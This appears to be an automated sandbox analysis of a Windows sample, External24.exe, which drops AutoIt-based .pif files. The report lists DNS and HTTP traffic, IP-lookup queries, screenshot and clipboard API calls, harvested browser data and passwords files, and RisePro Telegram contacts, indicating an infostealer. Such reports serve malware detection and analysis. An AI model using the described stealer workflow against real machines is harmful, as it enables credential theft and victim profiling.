Source: global traffic	HTTP traffic detected: GET /demo/home.php?s=8.46.123.33 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Host: db-ip.com

Source: global traffic	DNS traffic detected: DNS query: CcUPthUoPgCKIth.CcUPthUoPgCKIth
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: db-ip.com

Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: External24.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gscodesigng2.crl0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingg2.crl0T
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://crl.globalsign.net/root.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: External24.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: External24.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: External24.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: External24.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesigng20
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng2.crt04
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 0000000A.00000000.1667514341.0000000000728000.00000002.00000001.01000000.00000005.sdmp, PixelFlow.pif, 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmp, Lawyers.pif, 00000015.00000000.2875071248.0000000000728000.00000002.00000001.01000000.00000005.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Ivory.0.dr	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: External24.exe	String found in binary or memory: http://www.digicert.com/CPS0
Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.winimage.com/zLibDll
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33a
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com/demo/home.php?s=8.46.123.33tQ0
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://db-ip.com:443/demo/home.php?s=8.46.123.33j
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Lawyers.pif, Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/Mozilla/5.0
Source: Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/t
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/widget/demo/8.46.123.33
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501596780.0000000000F20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io:443/widget/demo/8.46.123.33
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: Lawyers.pif, 00000015.00000003.3018791915.000000000616A000.00000004.00000020.00020000.00000000.sdmp, lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, 7yC9aM3nOPMh37Qvw5GmIXM.zip.21.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.21.dr	String found in binary or memory: https://t.me/risepro_bot
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot33203
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Lawyers.pif, 0000000A.00000003.1678028298.00000000048B7000.00000004.00000800.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501773338.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif.10.dr, Lawyers.pif.1.dr, Camp.0.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Lawyers.pif	String found in binary or memory: https://www.maxmind.com/en/locate-my-ip-address
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018990250.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020594535.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021409514.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022662035.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020835160.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017414060.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018332936.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3023598157.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020119374.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3019672520.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020391892.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017934761.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022341285.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017683304.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021852441.0000000006154000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.21.dr, D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/d
Source: D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, History.txt.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/allets
Source: Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/e
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018990250.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020594535.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021409514.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022662035.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020835160.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017414060.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018332936.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3023598157.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020119374.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3019672520.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3020391892.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017934761.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3022341285.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3017683304.0000000006154000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021852441.0000000006154000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.21.dr, D87fZN3R3jFeplaces.sqlite.21.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/refoxm

Source: unknown	Network traffic detected: HTTP traffic on port 55334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55334
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55335

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:55334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.4:55335 version: TLS 1.2

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004050F9

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00674614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		15_2_00674614
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006D4614 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		21_2_006D4614

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Code function: 15_2_00674416 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

15_2_00674416

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Code function: 21_2_00C35FF0 GdiplusStartup,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdipDisposeImage,DeleteObject,ReleaseDC,GdiplusShutdown,

21_2_00C35FF0

Source: C:\Users\user\Desktop\External24.exe

Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_004044D1

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0068CEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		15_2_0068CEDF
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006ECEDF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,		21_2_006ECEDF

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Appearance entropy: 7.99802716721	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Therefore entropy: 7.99865168987	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Sharon entropy: 7.99552725011	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Anytime entropy: 7.99825278262	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Warming entropy: 7.99906740598	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Inspections entropy: 7.99494180936	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Physical entropy: 7.99885717625	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Helena entropy: 7.99326270642	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Lung entropy: 7.99793600042	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Zoning entropy: 7.99764197142	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Accidents entropy: 7.99887666637	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Latinas entropy: 7.99845945803	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Inflation entropy: 7.99886160045	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Wiley entropy: 7.99864940107	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Cincinnati entropy: 7.99899755257	Jump to dropped file
Source: C:\Users\user\Desktop\External24.exe	File created: C:\Users\user\AppData\Local\Temp\Army entropy: 7.99828016887	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\292668\r entropy: 7.99988284324	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\PixelFlow Creations\m entropy: 7.99988284324	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	File created: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip entropy: 7.99792293497	Jump to dropped file

System Summary

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

